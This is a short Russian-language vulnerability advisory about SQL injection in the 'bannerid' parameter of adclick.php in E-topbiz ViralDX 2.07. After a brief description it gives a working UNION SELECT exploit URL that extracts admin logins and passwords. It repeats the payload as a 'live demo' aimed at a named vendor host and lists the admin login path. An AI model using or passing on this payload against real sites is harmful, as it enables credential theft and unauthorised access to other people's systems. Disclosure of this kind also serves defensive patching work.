Программа: E-topbiz ViralDX 2.07

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «bannerid» сценарием adclick.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

http://www.site.com/Script/adclick.php?bannerid=-1+union+select+concat_ws
(0x3a,login,pass)+from+pass—

L!VE DEMO:

http://e-topbiz.com/trafficdemos/viraldx1/adclick.php?bannerid=-
1+union+select+concat_ws(0x3a,login,pass)+from+pass—

LoGiN:

/admin/login.php



Оставить мнение